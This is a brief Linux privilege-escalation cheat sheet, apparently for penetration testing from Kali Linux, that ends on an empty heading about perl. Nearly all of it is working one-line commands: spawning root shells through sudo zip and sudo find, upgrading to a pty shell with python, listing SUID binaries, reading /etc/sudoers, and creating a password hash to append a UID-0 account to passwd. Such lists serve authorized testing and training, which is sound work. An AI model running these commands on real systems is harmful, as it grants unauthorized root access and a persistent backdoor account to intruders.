Running commands with zip
 
sudo -u root zip /path-to-zip-file /path-to-output -T --unzip-command="sh -c /bin/bash"
 
=======================================================================
 
Spawning a shell through python
 
python -c 'import pty; pty.spawn("/bin/sh")'
 
python -c 'import pty; pty.spawn("/bin/bash")'
 
=======================================================================
 
Find binaries that have suid bit set (root)
 
find / -perm -u=s -type f 2>/dev/null
 
=======================================================================
 
Set what a user has on target with regards to permissions
 
find / -group [user] 2>/dev/null
 
=======================================================================
 
Find super users and what they can do
 
cat /etc/sudoers
 
=======================================================================
 
Create encoded password to add /etc/password manually
 
Execute this on your Kali Linux
 
perl -le 'print crypt("password","aa")'
 
This will give you a hash, you will copy hash and run this on target machine:
 
echo "username:<hash copied>:0:0:username:/root:/bin/bash" >> passwd
 
=======================================================================
 
Use 'awk' to execute system commands
 
awk 'BEGIN {system("commmand")}'
 
=======================================================================
 
Use python to execute system comamnds
 
python -c 'import os; os.system("commmmand")'
 
=======================================================================
Escalate privilage with find command
 
sudo find /home -exec /bin/bash \;
 
=======================================================================
Escalate privilage with perl
